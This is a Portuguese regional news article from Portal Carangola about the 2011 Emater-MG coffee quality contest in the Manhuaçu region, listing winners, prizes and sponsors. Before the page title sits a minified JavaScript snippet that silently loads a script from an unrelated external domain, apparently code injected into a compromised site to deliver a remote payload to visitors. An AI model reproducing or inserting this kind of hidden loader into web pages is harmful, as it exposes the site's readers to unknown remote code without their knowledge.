;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Manhumirim é o grande vencedor do concurso de qualidade do café. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Manhumirim é o grande vencedor do concurso de qualidade do café.

O concurso  de Qualidade do Café da Região das Matas de Minas,  foi realizado pela Emater MG Regional de Manhuaçu com a participação de cafeicultores dos 20 municípios da Região que compõem a Regional: Alto Caparaó, Alto Jequitibá, Caparaó, Chalé, Durandé, Lajinha, Luisburgo, Manhuaçu, Manhumirim, Martins Soares, Matipó, Orizânia, Reduto, Santa Margarida, Santana do Manhuaçu, São João do Manhuaçu, São José do Mantimento, Sericita, Simonésia, Vermelho Novo. Foram 382 cafeicultores participantes em duas categorias, sendo 321 cafeicultores concorrendo na categoria Café Natural e 61 cafeicultores concorrendo na categoria Café Cereja Descascasdo – CD. Categoria Café Natural:

 1º Lugar : THAMIRIS RODRIGUES DA SILVA do município de Manhumirim

2º Lugar: JOSÉ ODAIR RODRIGUES do município de Manhuaçu

3º Lugar: GERALDO RODRIGUES DOS REIS do município de Manhumirim

4º Lugar: JOSÉ ANTÔNIO DA COSTA do município de São João do Manhuaçu

5º Lugar: GIOVANI CÉSAR VIEIRA do município de Santa Margarida

  Categoria Café Cereja Descascado – CD:

 1º Lugar : JOSÉ ROCHA do município de Manhuaçu

2º Lugar: JOSÉ DUTRA SOBRINHO (ESPÓLIO) do município de São João do Manhuaçu

3º Lugar: LUIZ ANTÔNIO DA PAIXÃO NETO do município de São João do Manhuaçu

4º Lugar: ALBERTO NUNES SENA do município de Manhuaçu

5º Lugar: CECI MARIA DE FARIA do município de Manhuaçu

  Entre os 45 finalistas  na categoria Café Natural  e 48 na categoria CD (Cereja Descascado) do  VII Concurso de Qualidade do Café do Estado de Minas Gerais, promovido pela Secretaria de Estado da Agricultura, temos 15 finalistas (07 do natural e 08 do CD). Os três (3) primeiros colocados de cada Categoria estão concorrendo para a premiação dos 03 melhores cafés da Zona da Mata, segunda região produtora de café do Estado de Minas Gerais.   O Município de Manhumirim foi o grande vencedor na categoria de Café Natural (aquela em que o produtor seca o café em coco no terreiro ou secador), a mais concorrida, ficando com o 1º e 3º lugares e ainda tendo uma outra amostra entre os 7 finalista do Concurso Estadual. Isto é, das 7 amostras classificadas para o final do Concurso Estadual, 3 são de Manhumirim. Nesta categoria –café natural- no Estado, foram mais de 1.100 amostras inscritas (e 321 amostras da região de Manhuaçu e mais de 400 da Zona da Mata) e foram classificadas 45 para a etapa final, que acontecerá dia 16 de dezembro, no Palácio do Governo do Estado com a presença do Governador Anastasia . As  duas amostras dos produtores de Manhumirim premiadas no Concurso Regional promovido pela Unidade Regional da EMATER MG de Manhuaçu, estão concorrendo ainda para ser premiada entre os 03 melhores cafés naturais da Zona da Mata. Com estes resultados, podemos afirmar que Manhumirim produz o melhor café natural da Região de Manhuaçu e podendo ser um dos  os 03 melhores da Zona da Mata e entre os 45 melhores cafés de Minas Gerais

Foram distribuídos os seguintes prêmios entre os 05 primeiros colocados de cada categoria:

Certificados de classificação de cada produtor

Certificado à Prefeitura de Manhumirim como município campeão da categoria Café Natural

Certificado à Prefeitura de Manhuaçu como muncípio campeão da categoria Café Cereja Descascado – CD

02 TVs  de 32” LCD

540 kg de ciclus NK

10 caixas de FH Café

01 moto serra

01 pulverizador costal motorizado

02 pulverizadores costais manuais

10 kits de pulverização Altagro

10 análises foliares

10 manuais de Café Colheita e Preparo

O evento é realizado com o apoio das:

Prefeituras Municipais

Câmaras Municipais

IMA

Sindicato dos Trabalhadores Rurais

Sindicato dos Produtores Rurais

Associações

CMDRS

Cooperativas de Café

AABB de Manhuaçu

Parceiros da iniciativa privada

Contou com o patrocínio dos seguintes parceiros:

Laboratório do Sindicato Rural de Manhuaçu

Café Brasil Fertilizantes

Renascer Exportação e Importação LTDA

Banco do Brasil

Fertilizantes Heringer

Máquinas Agrícolas Garavini

Agrofértil Santiago

Atilla Torradores de Café

Treviso – John Deere

Comercial Scardua

O evento final foi realizado na AABB  de Manhuaçu no dia 24 de novembro de 2011 e, contou com a presença de cerca de 300 pessoas entre prefeitos, vereadores, secretários de agricultura, representantes de sindicatos de trabalhadores rurais, representantes de sindicatos de produtores rurais, cooperativas de café, Sebrae, CMDRS, Associações e principalmente de cafeicultores com suas famílias. Durante o evento foram realizadas duas palestras, sendo uma sobre o mercado de café pelo Coordenador Técnico Regional da Emater MG, Paulo Roberto, e a outra sobre Crédito Rural proferida pelo Gerente Sérgio da Agência do Banco do Brasil de Manhuaçu e pelo Assistente Técnico Rural do Banco do Brasil Paulo Cordeiro. Houve exposição de máquinas agrícolas e uma demonstração de torrefação de café. O café utilizado nesta demonstração, foi  um “blend” (mistura) dos melhores cafés participantes do concurso. Ao final do evento, foram servidos diversos pratos feitos com café e, servido um cafezinho preparado com o café torrado anteriormente, ou seja, um cafezinho dos melhores cafés participantes do concurso.

A prefeitura de Manhumirim, na administração do prefeito Ronaldo Lopes, tendo como secretário de Agricultura e Meio Ambiente, Edmilson de Oliveira, vem realizando grandes projetos em parceria com a Emater, gerando bons resultados para o município e produtores.

 Valtair da Silva Sousa – Assessoria de Comunicação – Prefeitura de Manhumirim


Ofertas


Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.